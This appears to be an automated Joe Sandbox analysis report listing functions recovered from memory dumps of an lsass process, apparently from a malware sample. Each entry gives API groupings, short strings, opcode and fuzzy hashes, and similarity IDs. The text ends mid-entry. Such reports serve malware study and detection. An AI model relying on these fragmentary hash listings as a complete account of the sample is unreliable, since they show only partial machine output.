                        Function 00000213BDCE9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction ID: 4d4d0faf7020efbe67ed0a855dfe3d6003a087379504cbf48fb87940a6e137d3
                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction Fuzzy Hash: 6631C57121A744D2EE25DB42A4087D57296F768BACF590935DE1E0B394FF3AE7458300
                        Function 00000213BDCF3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction ID: 1e37ad57197f2f5fd627e52480ce6183fe70d503e9319598513a9094b24cedb1
                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction Fuzzy Hash: DC118631718B4086EB50CB52F8583D976A1F7A8FECF144214EE5A8B798EF39C7188744
                        Function 00000213BDCE3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
                        • API String ID: 1092925422-2678910430
                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction ID: 12712e2fa7eb8b967a2fcefc972e563151717b3967eefe160898bd9f6f4aa3e4
                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction Fuzzy Hash: E7115A76308B4583EF14DB11E4082A962B2F799B8DF14012ADE890B758FF3ED709C704
                        Function 00000213BDCE5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction ID: 3446894e02afeb19a9966952644c75a0c5e86968940c19ee8a431a5bd0db41b7
                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction Fuzzy Hash: B6D18176219B4882DA70DB06E49439A7BA1F7D8B8CF100126EACD47BA9DF3DD751CB40
                        Function 00000213BDCE2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction ID: 44251474c1ee8a42ccd6e3d1f93cc1b766dec72a69286a1cba37760e0419152a
                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction Fuzzy Hash: FC31B572709B59C3EE14CF1695487A9A7A2FB68B8CF044030AE4807B55FF36E7658700
                        Function 00000213BDCECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction ID: 77ac6954afd6c966781107e5719d7c64fe3f53195b268d9a5bd80fbe793f95d1
                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction Fuzzy Hash: 08118EB024D28843FE24D321665E3E962435BB47BCF144738A87A477DAFE3AAB018700
                        Function 00000213BDCE199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction ID: 3eb0d0c2679584ddfa503f59038269ae77ed88556fc385ff5f1d0553037a01c9
                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction Fuzzy Hash: F0015B71308A4482EA20DB52A4487D963A2F798BCCF588035DE4A47758EF39CB49C700
                        Function 00000213BDCE36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction ID: 88d3306e3c19d980f3158101e8290f900e8424f24f65f37777eb6f4afb0b7499
                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction Fuzzy Hash: 0B015B7421AB4482EF24DB21F81D79632A2FB65B8EF140428C9890B758FF3EC7088714
                        Function 00000213BDCE8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction ID: 6fb5bacd63384bb3f90134f8c5460c85208d4914d2655ed1bad9711df1c3dd6d
                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction Fuzzy Hash: 22518BB26096048BEF14CB25E84CB9937A7F369B8CF508524DA1687788FF36EB41C740
                        Function 00000213BDCEBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction ID: 540f723a61500467f8a8b8c4ca4f47b4269590684ce67fd343b054dd3f87c0fa
                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction Fuzzy Hash: EEF0627121960582EF14CF24E44D3E96363EBA576DF540229CA6A492E8EF3EC34CC300
                        Function 00000213BDCE3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction ID: 143933a49c9e38150b676d3b6c803f89c80bf75aa8c52dce601b1f25c80bbb55
                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction Fuzzy Hash: 13F0F874718B8482EE14CB52B9181D96662AB68FDDF089130EE4A4BB18EE3DD74D8700
                        Function 00000213BDCE50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction ID: ff1cd853ef15dbd82275a915282ff6a598436b67fb0be58782aaa7236b1550e1
                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction Fuzzy Hash: 3502EF7221DB8486DB60CB55F45439ABBA1F3D4798F100125EACE87BA9DF7DDA44CB00
                        Function 00000213BDCE5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction ID: d223e9dcadd96ac9e86b04a6cfbd1f11c297519e412362c6c507cdbf370bb6f3
                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction Fuzzy Hash: 4361DC7652CB44C7EA60CB15E45835A7BA1F39478CF500129E68E87BA8EB7DDB51CF00
                        Function 00000213BDCC3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: d2d7dd6e1439f03189a3226a9b5cce41787e5537534634c01bb2080864e62fb7
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: D711E73265CE0101FE949328F44E3E910836B79B7CF4D4728AF66063D6FA36DB4042C1
                        Function 00000213BDCF4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: f9e4e7116411792c9900663e4fd0b77c758cabd73c1539257dc2faf97d7e1066
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: C311C132A1CA4711FF649568D4DD3E511436B783BCF188A24E9764E6DEEB36CB4C4200
                        Function 00000213BDCE9650 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ErrorLast
                        • String ID:
                        • API String ID: 1452528299-0
                        • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                        • Instruction ID: 32291ebe63344caa2b2a00819642319f6feb277e8a2eeb88ccaa8891375a908e
                        • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                        • Instruction Fuzzy Hash: 4311B4B021925843FE60DB61A84D3E832976BA47ECF044635E966477DAFE3AEB41C300
                        Function 00000213BDCBF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction ID: dd33b7bdeea741fb6d5fb3879698249c2b400a189a1bb143957139dfcfd1a244
                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction Fuzzy Hash: E561F73668E20842FE6ACB28E54C3EE6BA3E77174CF545815CA46177A5FB37CB418301
                        Function 00000213BDCEAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3544855599-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 1fa883078d8b0df735174c791d3315410991ce76529377e33f37aec33171b3e6
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 876179B3608B88CAEB10DF65D0443DD77A2F364B8CF144225EE4957B98EB39E284C704
                        Function 00000213BDCBA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: f6b80d2922ff79a09da4c367b45cc3c1b98fc3b25da29179d71979c1a959d6c1
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: E351AF32188288CAEF64CB15D44839C77A2F365B8CF185116DACD87BD5EB7AD750C709
                        Function 00000213BDCEAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: 3c048601c7fcc0ffe57f7261eab226645e3cc41df1823d05877d79c368e95740
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: FD515FB2108388CFEF64CB159588399B7A2F364B8DF184125EA5D87B95EB39E760C704
                        Function 00000213BDCB8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: dc5653ac438f2d6e495d45b1ca0cfa69a93c7d117f4fad526aed404aa48302df
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: 2D51ED327592088AEF19CF15E448B9837A6FB68B9CF548024DA0643788FB36DF458B08
                        Function 00000213BDCB83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: 82ec953c2abcd69afeb9a379956e593d8954b52f8e7d0185f21bbf325504b95f
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: A331C23165974486EF19DF11E8487993BA6FB68F8CF058014EE5B03788EB3ACB41CB48
                        Function 00000213BDCF2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction ID: d0ae188cb9208859d57580f57e68af91c772b1affd1422831023fc799dab810f
                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction Fuzzy Hash: BAD1E272718A808AEB11CFA5D4443DC7BB2F36579CF108216CE599BB9DEA35C70AC740
                        Function 00000213BDCE14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction ID: 31cca27c97c10b50b0d1f4af92040512d4615bcca040e4e08102490f9d85dd7c
                        • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction Fuzzy Hash: 91015A32648B94C6EB04DF66E9081CA77B2F798F8DF048425EA4A47729EE39D255C740
                        Function 00000213BDCF2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: 0ed097bee9c2838b483cb9f14b03d6e6f10cfa9755ec3a11846def29111419fb
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: AF91073270865089FF60DF6594483EDBBA2F764B8CF144109DE4A9B69CEB36C78AC700
                        Function 00000213BDCE7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction ID: f3e89c732882dc4be1fda66988cc4488258048f9f4970aa2de9805cb3fbce708
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: 80111F32754B0589EF00CB60E8593E833A4F76975CF440D25DAAD86798EB79C3988380
                        Function 00000213BDCB9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: bbb7cdb92cb596dcb0788d693a3b58d75f0e34908b0e226618241f28b02e5c54
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: ED616A32608B888AEB20DF65D4443DD77A2F768B8CF144215EF8917B98EB79D255C700
                        Function 00000213BDCE2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: 188ea66b7bcfd0c47726733c40de34c55d45513101da1f913a5e3211a342359a
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: A151D4B220C78983EE64DE29A55C3FAA753F3AA74CF440135DD5903B49EA3BE7058780
                        Function 00000213BDCF26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: 7ca704e4079fb843e18e962332c75f2c7a1687e35e23e5be027c6cd1584b2488
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: D841A572319A8082DB20CF25E4483D9B7A1F7A879CF504121EE8D8B798EB3DC645CB40
                        Function 00000213BDCE94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction ID: 450ba37ac19791e17a21ad49c035722d0e53f3451afd1a5ee852b307dddf2d54
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
